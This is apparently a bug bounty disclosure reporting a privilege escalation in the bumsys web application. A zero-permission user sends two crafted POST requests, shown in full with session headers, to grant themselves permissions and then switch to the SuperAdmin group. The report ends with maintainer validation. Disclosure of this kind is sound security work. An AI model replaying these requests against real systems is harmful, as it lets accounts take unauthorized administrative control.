No permission user can increase his role to administrator in unilogies/bumsys
Valid
Reported on
Jan 22nd 2023
Description
No permission user can increase his role to administrator
Proof of Concept
Hey,i am new on this platform :)
Steps:
- login your administrator account, go to people, and create a user with zero permission (you can create permission group with zero permission)
- then login your restricted account, you can use this request on restricted account to increase your group permission
POST /xhr/?module=settings&page=updategroup HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=4; currencySymbol=%EF%B7%BC; keepAlive=1; __ba188b0713783be306622ba4aefdc4ab41c7280b=20orpb72f8ieakfb6fo1e77382
Content-Length: 731
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
X-Csrf-Token: 2414b7867f66c768a2254edeb8f69ce0b3e32f06
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ceB9wSfSeAkInpk
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupName"
Accountant
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="group_id"
2
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.View
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Add
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Edit
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Delete
------WebKitFormBoundary1ceB9wSfSeAkInpk--
- in this request,i added users permissions(edit, delete,view)
- Then you can use this request to increase your role (changing empGroup parameter because I am gonna change my group to SuperAdmin group)
POST /xhr/?module=peoples&page=updateUser HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=4; currencySymbol=%EF%B7%BC; keepAlive=1; __ba188b0713783be306622ba4aefdc4ab41c7280b=20orpb72f8ieakfb6fo1e77382
Content-Length: 964
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
X-Csrf-Token: 2414b7867f66c768a2254edeb8f69ce0b3e32f06
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypjBO0WysSRbOfrco
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="employeeID"
4
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="empGroup"
1
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userHomepage"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userStatus"
Active
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userName"
testbro
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userEmail"
bruhbey+test@intigriti.me
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userPassword"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="confirmUserPassword"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="user_id"
14
------WebKitFormBoundarypjBO0WysSRbOfrco--
- change parameters with your account details (username, email etc.)
- id parameters are sequential and easy to guess (user_id, employeeID etc.)
Btw,i wanna ask a question.Is this local application? I wanna look at for idors
Thanks
Impact
Zero permission user can increase his role to SuperAdmin
Occurrences
We are processing your report and will contact the
unilogies/bumsys
team within 24 hours.
10 months ago
A
GitHub Issue
asking the maintainers to create a
SECURITY.md exists
10 months ago
The researcher's credibility has increased: +7
Hello @bruhbey, very good finding. Please note, we are currently working on it about the security and we do not release any stable release yet.
ajax.php#L367-L387
has been validated
to join this conversation